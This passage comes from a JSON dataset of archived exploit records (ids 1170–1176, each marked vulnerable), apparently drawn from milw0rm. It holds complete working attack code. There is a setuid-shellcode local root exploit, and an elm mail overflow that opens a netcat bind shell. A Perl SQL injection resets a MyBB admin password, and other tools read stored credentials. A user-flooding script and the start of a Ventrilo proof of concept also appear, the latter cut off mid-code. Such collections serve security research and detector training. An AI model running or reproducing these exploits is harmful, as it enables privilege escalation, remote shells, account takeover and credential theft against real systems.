890        "vulnerable": true
891    },
892    {
893        "exploit_id": 1170,
894        "content": "/* pileup-xpl.c - local root exploit\n\n *\n\n * by core\n\n *\n\n * Friday the 13th, July 2001\n\n *\n\n * based almost entirely on code by Cody Tubbs (loophole of hhp)\n\n *\n\n * $ ./pileup-xpl\n\n * pileup-xpl by core 2001 - beep beep root!\n\n * usage: ./pileup-xpl [offset] [align(0..3)]\n\n * Ret-addr: 0xbfffe09c, offset: 0, align: 0.\n\n * How many voices (1 to 9)\n\n * Starting speed (wpm)\n\n * (C)ompetion mode or (P)ractice mode\n\n * Enter '0' to abort the session! GL..\n\n *\n\n * TX              RX         TX           RX\n\n * --              --         --           --\n\n *\n\n * Accuracy: 0/6. Max speed: 13\n\n * Score: 0\n\n * Score: core wins!\n\n * core-2.03# id\n\n * uid=1000(core) gid=1000(core) euid=0(root) groups=1000(core)\n\n * core-2.03# exit\n\n * $\n\n *\n\n * greetz b10z, hhp, loophole\n\n *\n\n */\n\n#include <stdio.h> \n\n#include <stdlib.h>\n\n#include <unistd.h>\n\n\n\n#define SH_IS_BASH 1 /* if /bin/sh -> /bin/bash */\n\n\n\n#define PATH   \"/usr/bin/pileup\"  // Change to direct path if needed. \n\n#define OFFSET 0                  // Worked for me. \n\n#define ALIGN  0                  // Don't change. \n\n#define NOP    0x90               // x86 No OPeration. \n\n#define DBUF   20                 // 16+4(ebp)+4(eip)=24. \n\n#define DAT    \"calls.dat\"        // Required for exploitation. \n\n \n\nstatic char shellcode[]=\n\n\"\\x31\\xc0\" /* set[gu]id(0);/bin/cp /bin/sh /tmp/core;chmod 4555 /tmp/core */\n\n\"\\x31\\xdb\\xb0\\x17\\xcd\\x80\\x66\\x31\\xc0\\x66\\x31\\xdb\\xb0\\x2e\\xcd\\x80\"\n\n\"\\xeb\\x5e\\x5f\\x31\\xc0\\x88\\x47\\x07\\x88\\x47\\x0f\\x88\\x47\\x19\\x89\\x7f\"\n\n\"\\x1a\\x8d\\x77\\x08\\x89\\x77\\x1e\\x31\\xf6\\x8d\\x77\\x10\\x89\\x77\\x22\\x89\"\n\n\"\\x47\\x26\\x89\\xfb\\x8d\\x4f\\x1a\\x8d\\x57\\x26\\x31\\xc0\\xb0\\x02\\xcd\\x80\"\n\n\"\\x31\\xf6\\x39\\xc6\\x75\\x06\\xb0\\x0b\\xcd\\x80\\xeb\\x1d\\x31\\xd2\\x31\\xc0\"\n\n\"\\x31\\xdb\\x4b\\x8d\\x4f\\x26\\xb0\\x07\\xcd\\x80\\x31\\xc0\\x8d\\x5f\\x10\\x31\"\n\n\"\\xc9\\x66\\xb9\\x6d\\x09\\xb0\\x0f\\xcd\\x80\\x31\\xc0\\x40\\x31\\xdb\\xcd\\x80\"\n\n\"\\xe8\\x9d\\xff\\xff\\xff/bin/cp8/bin/sh8/tmp/core\";\n\n\n\nlong get_sp(void) {\n\n   __asm__(\"movl %esp,%eax\");\n\n} \n\n \n\nvoid usage(char *name){ \n\n   fprintf(stderr, \"pileup-xpl by core 2001 - beep beep root!\\n\");\n\n   fprintf(stderr, \"usage: %s [offset] [align(0..3)]\\n\", name);\n\n}\n\n \n\nint main(int argc, char **argv){ \n\n   char eipeip[DBUF], buffer[7192]; \n\n   char go[DBUF + 22]; \n\n   FILE *calls; \n\n   int i, offset, align; \n\n   long address;\n\n\n\n   usage(argv[0]);\n\n\n\n   /* Remove the config and write OWNED! */\n\n   unlink(DAT);\n\n   calls = fopen(DAT, \"w\");\n\n   fprintf(calls, \"OWNED\\n\");\n\n   fclose(calls);\n\n\n\n   /* Do command line */\n\n   if (argc > 1) {\n\n      offset = atoi(argv[1]);\n\n   }\n\n   else {\n\n      offset = OFFSET;\n\n   } \n\n\n\n   if (argc > 2) { \n\n      align = atoi(argv[2]);\n\n   } \n\n   else { \n\n      align = ALIGN;\n\n   } \n\n\n\n   address = get_sp() - offset;\n\n \n\n   if (align > 0) {\n\n      for(i=0; i < align; i++) {\n\n\t eipeip[i] = 0x69;\n\n      }\n\n   }\n\n \n\n   for (i=align; i < DBUF; i+=4) {\n\n      *(long *)&eipeip[i] = address;\n\n   } \n\n   for (i=0; i < (7192 - strlen(shellcode) - strlen(eipeip)); i++) {\n\n      buffer[i] = NOP;\n\n   }\n\n\n\n   /* setup the environment */\n\n   memcpy(buffer + i, shellcode, strlen(shellcode)); \n\n   memcpy(buffer, \"UPEX=\", 5);\n\n   putenv(buffer);\n\n   \n\n   fprintf(stderr, \"Ret-addr: %#x, offset: %d, align: %d.\\n\", address, \\\n\n\t   offset, align); \n\n\n\n   sprintf(go, \"(printf '1\\n0\\nC\\n%s\\n0\\n')|%s\", eipeip, PATH); //netcat style.\n\n   system(go);\n\n\n\n   fprintf(stderr, \"Score: core wins!\\n\");\n\n   \n\n#ifdef SH_IS_BASH   \n\n   system(\"/tmp/core -p\");\n\n#else\n\n   system(\"/tmp/core\");\n\n#endif\n\n\n\n   return 0;\n\n} \n\n\n\n// milw0rm.com [2001-07-13]",
895        "vulnerable": true
896    },
897    {
898        "exploit_id": 1171,
899        "content": "/*\n\n\n\n  Exploit code for the bug posted by Ulf Harnhammar (metaurtelia.com)\n\n  http://archives.neohapsis.com/archives/fulldisclosure/2005-08/0688.html\n\n\n\n  Probably you will need to change SYSLOC and STRLOC to work on your box\n\n\n\n*/\n\n\n\n\n\n#include <stdio.h>\n\n#include <stdlib.h>\n\n#include <string.h>\n\n#include <unistd.h>\n\n\n\n#define BUFFER 83\n\n#define EMAIL  \"tmpmail\"\n\n#define STRING \"`nc -l -p 12345 -e /bin/sh`&##\"\n\n#define SYSLOC 0x42041e50\n\n#define STRLOC 0x4001a207\n\n#define EXTLOC 0x4202b0f0\n\n\n\nchar expire[]=\"\\x45\\x78\\x70\\x69\\x72\\x65\\x73\\x3A\\x20\";\n\n\n\nint main(int argc, char **argv)\n\n{\n\n      char buffer[BUFFER];\n\n      char *email = NULL;\n\n      char *user = NULL;\n\n      int i;\n\n      long extloc, sysloc, strloc;\n\n      FILE *fp;\n\n\n\n      if(argc != 2) {\n\n        puts(\"Usage: ./elmex <user@where.com>\");\n\n        exit(EXIT_FAILURE);\n\n      }\n\n\n\n      if(strlen(argv[1]) > 50) {\n\n              puts(\"[-] Sorry, email address too long!\");\n\n              exit(EXIT_FAILURE);\n\n      }\n\n\n\n      user = (char *)malloc(strlen(argv[1]));\n\n      if(!user) {\n\n              perror(\"malloc\");\n\n              exit(EXIT_FAILURE);\n\n      }\n\n\n\n      email = EMAIL;\n\n\n\n      memset(user, '\\0', strlen(argv[1]));\n\n      memcpy(user, argv[1], strlen(argv[1]));\n\n\n\n      puts(\"\\nExploit for elm email client < 2.5.8 overflow in Expires field\");\n\n      puts(\"Tested: Redhat on quiet a Sunday by c0ntex[at]open-security.org\\n\");\n\n\n\n      extloc = EXTLOC;\n\n      sysloc = SYSLOC;\n\n      strloc = STRLOC;\n\n\n\n      memset(buffer, '\\0', BUFFER);\n\n      memcpy(buffer, expire, strlen(expire));\n\n\n\n      for(i = strlen(expire); i < 53; i++)\n\n              *(buffer+i) = 0x41;\n\n      for(i = 53; i < 57; i += 4)\n\n              *(long *)&buffer[i] = sysloc;\n\n      for(i = 57; i < 61; i++)\n\n              *(long *)&buffer[i] = extloc;\n\n      for(i = 61; i < 65; i += 4)\n\n              *(long *)&buffer[i] = strloc;\n\n\n\n      memcpy(&buffer[65], STRING, strlen(STRING));\n\n      buffer[BUFFER] = '\\0';\n\n\n\n      puts(\"[-] Adding exploit buffer to email\");\n\n\n\n      fp = fopen(email, \"w\");\n\n      if(!fp) {\n\n              perror(\"fopen\"); free(user);\n\n              exit(EXIT_FAILURE);\n\n      }\n\n\n\n      fprintf(fp,\n\n               \"From: User c0ntex <c0ntex@open-security.org> Sun Aug 21 13:37:00 2005\\n\"\n\n               \"Return-Path: <c0ntex@localhost\\n\"\n\n               \"Date: Sun, 21 Aug 2005 13:37:00 %s\\n\"\n\n               \"Subject: Insecure?\\n\"\n\n               \"To: %s\\n\"\n\n               \"%s\\n\", STRING, user, buffer);\n\n      fclose(fp);\n\n\n\n      printf(\"[-] Emailing %s with malicious content\\n\", argv[1]);\n\n\n\n      if(system(\"/bin/cat ./tmpmail | /usr/sbin/sendmail -t\") <0) {\n\n              perror(\"system\");  free(user);\n\n              exit(EXIT_FAILURE);\n\n      }\n\n\n\n      puts(\"[-] Connect to system on port 12345 to get your shell\\n\");\n\n\n\n      if(unlink(EMAIL) <0)\n\n              perror(\"unlink\");\n\n\n\n      free(user);\n\n\n\n      return EXIT_SUCCESS;\n\n}\n\n\n\n// milw0rm.com [2005-08-22]",
900        "vulnerable": true
901    },
902    {
903        "exploit_id": 1172,
904        "content": "# mybb is dead /str0ke\n\n\n\n#!/usr/bin/perl\n\n######################################################################################\n\n#                              Crouz.Com Security Team                               #\n\n######################################################################################\n\n#    EXPLOIT FOR: MyBulletinBoard Search.PHP SQL Injection Vulnerability             #\n\n#                                                                                    #\n\n#Expl0it By: A l p h a _ P r o g r a m m e r (sirius)                                #\n\n#Email: Alpha_Programmer@LinuxMail.ORG                                               #\n\n#                                                                                    #\n\n#This Xpl Change Admin's Pass For L0gin With P0wer User                              #\n\n#                                                                                    #\n\n#HACKERS PAL & Devil-00 & ABDUCTER are credited with the discovery of this vuln      #\n\n#                                                                                    #\n\n######################################################################################\n\n# GR33tz T0 ==>  mh_p0rtal  --  Dr-CephaleX  --  The-Cephexin  -- Djay_Agoustinno    #\n\n#               No_Face_King --  Behzad185 -- Autumn_Love6(Hey Man You Are Singular) #\n\n#                                                                                    #\n\n#   Special Lamerz : Hoormazd  &  imm02tal  :P  ++ xshabgardx                        #\n\n######################################################################################\n\n\n\nuse IO::Socket;\n\n\n\nif (@ARGV < 2)\n\n{\n\n  print \"\\n==========================================\\n\";\n\n  print \" \\n     -- Exploit By Alpha Programmer(sirius) --\\n\\n\";\n\n  print \"              Crouz Security Team      \\n\\n\";\n\n  print \"         Usage: <T4rg3t> <DIR>\\n\\n\"; \n\n  print \"==========================================\\n\\n\";\n\n  print \"Examples:\\n\\n\";\n\n  print \"    Mybb.pl www.Site.com /mybb/ \\n\";\n\n  exit();\n\n\n\n}\n\nmy $host = $ARGV[0];\n\nmy $dir = $ARGV[1];\n\nmy $remote = IO::Socket::INET->new ( Proto => \"tcp\", PeerAddr => $host, \n\nPeerPort => \"80\" );\n\nunless ($remote) { die \"C4nn0t C0nn3ct to $host\" }\n\nprint \"C0nn3cted\\n\";\n\n$http = \"GET $dir/search.php?action=finduser&uid=-1' ; update mybb_users set username='da05581c9137f901f4fa4da5a958c273' , password='da05581c9137f901f4fa4da5a958c273' where usergroup=4 and uid=1 HTTP/1.0\\n\";\n\n$http .= \"Host: $host\\n\\n\\n\\n\";\n\nprint \"\\n\";\n\nprint $remote $http;\n\nprint \"Wait For Changing Password ...\\n\";\n\nsleep(10);\n\nprint \"OK , Now Login With :\\n\";\n\nprint \"Username: crouz\\n\";\n\nprint \"Password: crouz\\n\\n\";\n\nprint \"Enjoy ;)\\n\\n\";\n\n\n\n# milw0rm.com [2005-08-22]",
905        "vulnerable": true
906    },
907    {
908        "exploit_id": 1173,
909        "content": "/*================================================================\n\n\n\nMercora IMRadio 4.0.0.0 password disclosure local exploit by Kozan\n\n\n\nDiscovered & Coded by: Kozan\n\nCredits to ATmaCA\n\nWeb: www.spyinstructors.com\n\nMail: kozan@netmagister.com\n\n\n\n=====[ Application ]==============================================\n\n\n\nApplication: Mercora IMRadio 4.0.0.0 (and probably prior versions)\n\nVendor: www.mercora.com\n\n\n\n=====[ Introduction ]=============================================\n\n\n\nSearch, listen, and record any music. With over 2.5 million unique\n\ntracks, Mercora is a legal music radio network powered by people,\n\nDJs, and artists just like you. Mercora combines Internet streaming,\n\ncountry-specific copyright compliance, and social networking\n\ntechnologies to create the next generation of digital music.\n\nVersion 4.0 supports friends and family listening, a vastly\n\nsimplified interface, customized listening, and live music search.\n\n\n\n=====[ Bug ]======================================================\n\n\n\nMercora IMRadio 4.0.0.0 stores username and passwords in the Windows\n\nRegistry in plain text. A local user can read the values.\n\n\n\nHKEY_CURRENT_USER\\Software\\Mercora\\MercoraClient\\Profiles\n\nAuto.Username = Mercora IMRadio Username\n\nAuto.Password = Mercora IMRadio Password\n\n\n\n=====[ Vendor Confirmed ]=========================================\n\n\n\nNo\n\n\n\n=====[ Fix ]======================================================\n\n\n\nThere is no solution at the time of this entry.\n\n\n\n================================================================*/\n\n\n\n#include <stdio.h>\n\n#include <windows.h>\n\n#define BUF 100\n\n\n\nint main()\n\n{\n\n       HKEY hKey;\n\n       char Username[BUF], Password[BUF];\n\n       DWORD dwBUFLEN = BUF;\n\n       LONG lRet;\n\n\n\n       if( RegOpenKeyEx(HKEY_CURRENT_USER,\n\n                                       \"Software\\\\Mercora\\\\MercoraClient\\\\Profiles\",\n\n                                       0,\n\n                                       KEY_QUERY_VALUE,\n\n                                       &hKey\n\n                                       ) == ERROR_SUCCESS )\n\n       {\n\n               lRet = RegQueryValueEx(hKey, \"Auto.Password\", NULL, NULL, (LPBYTE)Password, &dwBUFLEN);\n\n               if (lRet != ERROR_SUCCESS || dwBUFLEN > BUF) strcpy(Password,\"Not Found!\");\n\n\n\n               lRet = RegQueryValueEx(hKey, \"Auto.Username\", NULL, NULL, (LPBYTE)Username, &dwBUFLEN);\n\n               if (lRet != ERROR_SUCCESS || dwBUFLEN > BUF) strcpy(Username,\"Not Found!\");\n\n\n\n               RegCloseKey(hKey);\n\n\n\n               fprintf(stdout, \"Mercora IMRadio 4.0.0.0 password disclosure local exploit by Kozan\\n\");\n\n               fprintf(stdout, \"Credits to ATmaCA\\n\");\n\n               fprintf(stdout, \"www.spyinstructors.com \\n\");\n\n               fprintf(stdout, \"kozan@spyinstructors.com\\n\\n\");\n\n               fprintf(stdout, \"Username :\\t%s\\n\",Username);\n\n               fprintf(stdout, \"Password :\\t%s\\n\",Password);\n\n       }\n\n       else\n\n       {\n\n               fprintf(stderr, \"Mercora IMRadio 4.0.0.0 is not installed on your system!\\n\");\n\n       }\n\n\n\n       return 0;\n\n}\n\n\n\n// milw0rm.com [2005-08-22]",
910        "vulnerable": true
911    },
912    {
913        "exploit_id": 1174,
914        "content": "/*================================================================\n\n\n\nZipTorrent 1.3.7.3 Local Proxy Password Disclosure Exploit by Kozan\n\n\n\nDiscovered & Coded by Kozan\n\nCredits to ATmaCA\n\nWeb: www.spyinstructors.com\n\nMail: kozan@spyinstructors.com\n\n\n\nApplication:\n\n--------------------\n\nZipTorrent 1.3.7.3 (and probably prior versions)\n\nVendor: www.ziptorrent.com\n\n\n\nIntroduction:\n\n--------------------\n\nZipTorrent is the fastest BitTorrent client for Windows with the\n\nmost features, such as Search om Major search engines an RSS reader,\n\nIRC Chat rooms, Automatic Torrent Download Rules, Automatic Update,\n\nBandwidth Monitor, NAT Checking, and UPnP Support. An install wizard\n\nthat helps you through the installation process.\n\n\n\nBug:\n\n--------------------\n\nZipTorrent stores proxy server information and password in\n\nX:\\\\[Program_Files_Path]\\[ZipTorrent_Path]\\pref.txt\n\nin plain text. A local user can read passwords and others.\n\n\n\nVendor Confirmed:\n\n--------------------\n\nNo\n\n\n\nFix:\n\n--------------------\n\nThere is no solution at the time of this entry.\n\n\n\n================================================================*/\n\n\n\n\n\n\n\n#include <stdio.h>\n\n#include <windows.h>\n\n\n\n\n\n\n\nint GetOffset(char *FilePath, char *Str)\n\n{\n\n       char kr;\n\n       int Sayac=0;\n\n       int Offset=-1;\n\n       FILE *di;\n\n       if( (di=fopen(FilePath,\"rb\")) == NULL )\n\n       {\n\n               fclose(di);\n\n               return -1;\n\n       }\n\n\n\n       while(!feof(di))\n\n       {\n\n               Sayac++;\n\n               for(int i=0;i<strlen(Str);i++)\n\n               {\n\n                       kr=getc(di);\n\n                       if(kr != Str[i])\n\n                       {\n\n                               if( i>0 ) fseek(di,Sayac+1,SEEK_SET);\n\n                               break;\n\n                       }\n\n\n\n                       if( i > ( strlen(Str)-2 ) )\n\n                       {\n\n                               Offset = ftell(di)-strlen(Str);\n\n                               fclose(di);\n\n                               return Offset;\n\n                       }\n\n               }\n\n       }\n\n\n\n       fclose(di);\n\n       return -1;\n\n}\n\n\n\n\n\nchar *ReadString(char *FilePath, char *Str)\n\n{\n\n       FILE *di;\n\n       char cr;\n\n       int i=0;\n\n       char Feature[500];\n\n\n\n       int Offset = GetOffset(FilePath,Str);\n\n\n\n       if( Offset == -1 ) return NULL;\n\n       if( (di=fopen(FilePath,\"rb\")) == NULL ) return NULL;\n\n\n\n       fseek(di,Offset+strlen(Str),SEEK_SET);\n\n\n\n       while(!feof(di))\n\n       {\n\n               cr=getc(di);\n\n               if(cr == 0x0D) break;\n\n               Feature[i] = cr;\n\n               i++;\n\n       }\n\n\n\n       Feature[i] = '\\0';\n\n       fclose(di);\n\n       return Feature;\n\n}\n\n\n\nchar *GetZipTorrentPath()\n\n{\n\n       HKEY hKey;\n\n       char szZipTorrentPath[MAX_PATH];\n\n       DWORD dwBufLen = MAX_PATH;\n\n       LONG lRet;\n\n\n\n       if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,\n\n                                       \"SOFTWARE\\\\ZipTorrent\",\n\n                                       0,\n\n                                       KEY_QUERY_VALUE,\n\n                                       &hKey\n\n                                       ) == ERROR_SUCCESS)\n\n       {\n\n               lRet = RegQueryValueEx( hKey,\n\n                                                               \"Install_Dir\",\n\n                                                               NULL,\n\n                                                               NULL,\n\n                                                               (LPBYTE) szZipTorrentPath,\n\n                                                               &dwBufLen);\n\n\n\n               if( (lRet != ERROR_SUCCESS) || (dwBufLen > MAX_PATH) )\n\n               {\n\n                       RegCloseKey(hKey);\n\n                       return NULL;\n\n               }\n\n               RegCloseKey(hKey);\n\n               return szZipTorrentPath;\n\n       }\n\n       return NULL;\n\n}\n\n\n\n\n\nint main()\n\n{\n\n       char szPwdFile[MAX_PATH];\n\n       char szServer[255], szPort[255], szUsername[255], szPassword[255];\n\n       bool bInstalled;\n\n       if( GetZipTorrentPath() == NULL ) bInstalled = false;\n\n       else\n\n       {\n\n               bInstalled = true;\n\n               strcpy(szPwdFile, GetZipTorrentPath());\n\n               strcat(szPwdFile, \"\\\\pref.txt\");\n\n               strcpy(szServer, ReadString(szPwdFile, \"proxy_ip | \"));\n\n               strcpy(szPort, ReadString(szPwdFile, \"proxy_port | \"));\n\n               strcpy(szUsername, ReadString(szPwdFile, \"proxy_username | \"));\n\n               strcpy(szPassword, ReadString(szPwdFile, \"proxy_password | \"));\n\n       }\n\n\n\n       fprintf(stdout, \"ZipTorrent 1.3.7.3 Local Proxy Password Disclosure\n\nExploit by Kozan\\n\");\n\n       fprintf(stdout, \"Credits to ATmaCA\\n\");\n\n       fprintf(stdout, \"Web: www.spyinstructors.com \\n\");\n\n       fprintf(stdout, \"Mail: kozan@spyinstructors.com \\n\\n\");\n\n\n\n       if( !bInstalled )\n\n       {\n\n               fprintf(stderr, \"ZipTorrent is not installed on your pc!\\n\");\n\n               return -1;\n\n       }\n\n\n\n       fprintf(stdout, \"Proxy Server\\t: \\t%s\\n\", szServer);\n\n       fprintf(stdout, \"Proxy Port\\t: \\t%s\\n\", szPort);\n\n       fprintf(stdout, \"Proxy Username\\t: \\t%s\\n\", szUsername);\n\n       fprintf(stdout, \"Proxy Username\\t: \\t%s\\n\", szPassword);\n\n\n\n       return 0;\n\n}\n\n\n\n// milw0rm.com [2005-08-22]",
915        "vulnerable": true
916    },
917    {
918        "exploit_id": 1175,
919        "content": "# Use a high user # for best results. /str0ke\n\n\n\n#!/usr/bin/perl\n\n######################\n\n# codez0red by VTECin5th #\n\n# Feel free to modify/break this script #\n\n# Crappy code is more effective =] #\n\n# I accept no responsibility for misuse or abuse #\n\n######################\n\n# Usage: xxx.pl www.server.com /directory_to_chat/ #_of_users_to_create\n\n######################\n\n# Affected Software: GTChat .95\n\n# Unaffected Software: GTChat .93\n\n######################\n\nuse IO::Socket;\n\nif (@ARGV < 2){\n\nprint \"Usage:\\n xxx.pl www.server.com /Path_to_GTChat/ #_of_users_to_create\\n\";\n\nprint \"Example:\\n xxx.pl www.serfer.com /GTChat/cgi-bin/ 5\";\n\nexit;\n\n}\n\n$dir = $ARGV[1];\n\n$numero = $ARGV[2];\n\n$host = $ARGV[0];\n\n$host =~ s/http\\:\\/\\///gi;\n\nfor ($i = 1; $i <= $numero; $i++) {\n\n$rando = int(rand(234));\n\n$randy = int(rand(12));\n\n$whyThem = $randy . $rando . \"@\" . $randy . \".com\";\n\n$whyMe = \"SoSorry\" . $rando . $randy;\n\n$lol = \"$dir/chat.pl?action=register&name=$whyMe&password=$whyMe&password2=$whyMe&email=$whyThem&privateemail=0\";\n\n$ox=IO::Socket::INET->new(PeerAddr=>$host,PeerPort=>80,Proto=>'tcp') || die \"Oh No! You broke teh server!\";\n\nprint $ox \"GET $lol HTTP/1.1\\r\\n\";\n\nprint $ox \"Accept: */*\\r\\n\";\n\nprint $ox \"Accept-Language: pt\\r\\n\";\n\nprint $ox \"Accept-Encoding: gzip, deflate\\r\\n\";\n\nprint $ox \"User-Agent: 1337 pwnz0r\\r\\n\";\n\nprint $ox \"Host: $host\\r\\n\";\n\nprint $ox \"Connection: Keep-Alive\\r\\n\\r\\n\\r\\n\";\n\nprint \"currently on: $whyMe \\t ($i)\\n\";\n\n# Please note, this does not verify whether or not the user is actually being created.\n\n# I assume you know how to use this script.\n\n}\n\nprint \"Finished creating $numero users\";\n\nclose($ox);\n\n\n\n# milw0rm.com [2005-08-23]",
920        "vulnerable": true
921    },
922    {
923        "exploit_id": 1176,
924        "content": "/*\n\n\n\nby Luigi Auriemma\n\n\n\n\n\nWindows compiled version:\n\nhttp://aluigi.altervista.org/poc/ventboom.zip\n\n/str0ke\n\n*/\n\n\n\n#include <stdio.h>\n\n#include <stdlib.h>\n\n#include <string.h>\n\n/*\n\n\n\nVentrilo UDP status algorithm 0.1\n\nby Luigi Auriemma\n\ne-mail: aluigi@autistici.org\n\nweb:    http://aluigi.altervista.org\n\n\n\n\n\nINTRODUCTION\n\n============\n\nThis algorithm is the method used by the chat program Ventrilo\n\n(http://www.ventrilo.com) for encoding the UDP packets used to get\n\nthe status informations.\n\n\n\n\n\nFUNCTIONS\n\n=========\n\nstruct ventrilo_udp_head\n\nvoid ventrilo_udp_head_dec(unsigned char *data)\n\nvoid ventrilo_udp_head_enc(unsigned char *data)\n\nvoid ventrilo_udp_data_dec(unsigned char *data, int len, unsigned short key)\n\nunsigned short ventrilo_udp_data_enc(unsigned char *data, int len)\n\nunsigned short ventrilo_udp_crc(unsigned char *data, int len)\n\n\n\n\n\nUSAGE EXAMPLE\n\n=============\n\nWatch my \"Ventrilo status retriever\" code for a simple and practical example:\n\n\n\n  http://aluigi.altervista.org/papers/ventstat.zip\n\n\n\n\n\nLICENSE\n\n=======\n\n    Copyright 2005 Luigi Auriemma\n\n\n\n    This program is free software; you can redistribute it and/or modify\n\n    it under the terms of the GNU General Public License as published by\n\n    the Free Software Foundation; either version 2 of the License, or\n\n    (at your option) any later version.\n\n\n\n    This program is distributed in the hope that it will be useful,\n\n    but WITHOUT ANY WARRANTY; without even the implied warranty of\n\n    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n\n    GNU General Public License for more details.\n\n\n\n    You should have received a copy of the GNU General Public License\n\n    along with this program; if not, write to the Free Software\n\n    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307 USA\n\n\n\n    http://www.gnu.org/licenses/gpl.txt\n\n\n\n*/\n\n\n\n#include <time.h>\n\n#ifdef WIN32\n\n    #include <winsock.h>\n\n    #define VENTRILO_RAND   clock()\n\n#else\n\n    #include <netinet/in.h>\n\n    #include <sys/times.h>\n\n    #define VENTRILO_RAND   times(0)\n\n#endif\n\n\n\n\n\n\n\ntypedef struct {\n\n    unsigned short pckkey;  // key for decoding this header\n\n    unsigned short zero;    // ever 0\n\n    unsigned short cmd;     // command number: 1 generic info, 2 for details\n\n    unsigned short id;      // packet ID used for tracking the replies\n\n    unsigned short totlen;  // total data size (for data splitted in packets)\n\n    unsigned short len;     // size of the data in this packet (max 492)\n\n    unsigned short totpck;  // total amount of packets (max 32)\n\n    unsigned short pck;     // current packet number\n\n    unsigned short datakey; // key for decoding the data\n\n    unsigned short crc;     // checksum of the total plain-text data\n\n} ventrilo_udp_head;\n\n\n\n\n\n\n\nconst static unsigned char  ventrilo_udp_encdata_head[] =\n\n    \"\\x80\\xe5\\x0e\\x38\\xba\\x63\\x4c\\x99\\x88\\x63\\x4c\\xd6\\x54\\xb8\\x65\\x7e\"\n\n    \"\\xbf\\x8a\\xf0\\x17\\x8a\\xaa\\x4d\\x0f\\xb7\\x23\\x27\\xf6\\xeb\\x12\\xf8\\xea\"\n\n    \"\\x17\\xb7\\xcf\\x52\\x57\\xcb\\x51\\xcf\\x1b\\x14\\xfd\\x6f\\x84\\x38\\xb5\\x24\"\n\n    \"\\x11\\xcf\\x7a\\x75\\x7a\\xbb\\x78\\x74\\xdc\\xbc\\x42\\xf0\\x17\\x3f\\x5e\\xeb\"\n\n    \"\\x74\\x77\\x04\\x4e\\x8c\\xaf\\x23\\xdc\\x65\\xdf\\xa5\\x65\\xdd\\x7d\\xf4\\x3c\"\n\n    \"\\x4c\\x95\\xbd\\xeb\\x65\\x1c\\xf4\\x24\\x5d\\x82\\x18\\xfb\\x50\\x86\\xb8\\x53\"\n\n    \"\\xe0\\x4e\\x36\\x96\\x1f\\xb7\\xcb\\xaa\\xaf\\xea\\xcb\\x20\\x27\\x30\\x2a\\xae\"\n\n    \"\\xb9\\x07\\x40\\xdf\\x12\\x75\\xc9\\x09\\x82\\x9c\\x30\\x80\\x5d\\x8f\\x0d\\x09\"\n\n    \"\\xa1\\x64\\xec\\x91\\xd8\\x8a\\x50\\x1f\\x40\\x5d\\xf7\\x08\\x2a\\xf8\\x60\\x62\"\n\n    \"\\xa0\\x4a\\x8b\\xba\\x4a\\x6d\\x00\\x0a\\x93\\x32\\x12\\xe5\\x07\\x01\\x65\\xf5\"\n\n    \"\\xff\\xe0\\xae\\xa7\\x81\\xd1\\xba\\x25\\x62\\x61\\xb2\\x85\\xad\\x7e\\x9d\\x3f\"\n\n    \"\\x49\\x89\\x26\\xe5\\xd5\\xac\\x9f\\x0e\\xd7\\x6e\\x47\\x94\\x16\\x84\\xc8\\xff\"\n\n    \"\\x44\\xea\\x04\\x40\\xe0\\x33\\x11\\xa3\\x5b\\x1e\\x82\\xff\\x7a\\x69\\xe9\\x2f\"\n\n    \"\\xfb\\xea\\x9a\\xc6\\x7b\\xdb\\xb1\\xff\\x97\\x76\\x56\\xf3\\x52\\xc2\\x3f\\x0f\"\n\n    \"\\xb6\\xac\\x77\\xc4\\xbf\\x59\\x5e\\x80\\x74\\xbb\\xf2\\xde\\x57\\x62\\x4c\\x1a\"\n\n    \"\\xff\\x95\\x6d\\xc7\\x04\\xa2\\x3b\\xc4\\x1b\\x72\\xc7\\x6c\\x82\\x60\\xd1\\x0d\";\n\n\n\nconst static unsigned char  ventrilo_udp_encdata_data[] =\n\n    \"\\x82\\x8b\\x7f\\x68\\x90\\xe0\\x44\\x09\\x19\\x3b\\x8e\\x5f\\xc2\\x82\\x38\\x23\"\n\n    \"\\x6d\\xdb\\x62\\x49\\x52\\x6e\\x21\\xdf\\x51\\x6c\\x76\\x37\\x86\\x50\\x7d\\x48\"\n\n    \"\\x1f\\x65\\xe7\\x52\\x6a\\x88\\xaa\\xc1\\x32\\x2f\\xf7\\x54\\x4c\\xaa\\x6d\\x7e\"\n\n    \"\\x6d\\xa9\\x8c\\x0d\\x3f\\xff\\x6c\\x09\\xb3\\xa5\\xaf\\xdf\\x98\\x02\\xb4\\xbe\"\n\n    \"\\x6d\\x69\\x0d\\x42\\x73\\xe4\\x34\\x50\\x07\\x30\\x79\\x41\\x2f\\x08\\x3f\\x42\"\n\n    \"\\x73\\xa7\\x68\\xfa\\xee\\x88\\x0e\\x6e\\xa4\\x70\\x74\\x22\\x16\\xae\\x3c\\x81\"\n\n    \"\\x14\\xa1\\xda\\x7f\\xd3\\x7c\\x48\\x7d\\x3f\\x46\\xfb\\x6d\\x92\\x25\\x17\\x36\"\n\n    \"\\x26\\xdb\\xdf\\x5a\\x87\\x91\\x6f\\xd6\\xcd\\xd4\\xad\\x4a\\x29\\xdd\\x7d\\x59\"\n\n    \"\\xbd\\x15\\x34\\x53\\xb1\\xd8\\x50\\x11\\x83\\x79\\x66\\x21\\x9e\\x87\\x5b\\x24\"\n\n    \"\\x2f\\x4f\\xd7\\x73\\x34\\xa2\\xf7\\x09\\xd5\\xd9\\x42\\x9d\\xf8\\x15\\xdf\\x0e\"\n\n    \"\\x10\\xcc\\x05\\x04\\x35\\x81\\xb2\\xd5\\x7a\\xd2\\xa0\\xa5\\x7b\\xb8\\x75\\xd2\"\n\n    \"\\x35\\x0b\\x39\\x8f\\x1b\\x44\\x0e\\xce\\x66\\x87\\x1b\\x64\\xac\\xe1\\xca\\x67\"\n\n    \"\\xb4\\xce\\x33\\xdb\\x89\\xfe\\xd8\\x8e\\xcd\\x58\\x92\\x41\\x50\\x40\\xcb\\x08\"\n\n    \"\\xe1\\x15\\xee\\xf4\\x64\\xfe\\x1c\\xee\\x25\\xe7\\x21\\xe6\\x6c\\xc6\\xa6\\x2e\"\n\n    \"\\x52\\x23\\xa7\\x20\\xd2\\xd7\\x28\\x07\\x23\\x14\\x24\\x3d\\x45\\xa5\\xc7\\x90\"\n\n    \"\\xdb\\x77\\xdd\\xea\\x38\\x59\\x89\\x32\\xbc\\x00\\x3a\\x6d\\x61\\x4e\\xdb\\x29\";\n\n\n\n\n\n\n\nvoid 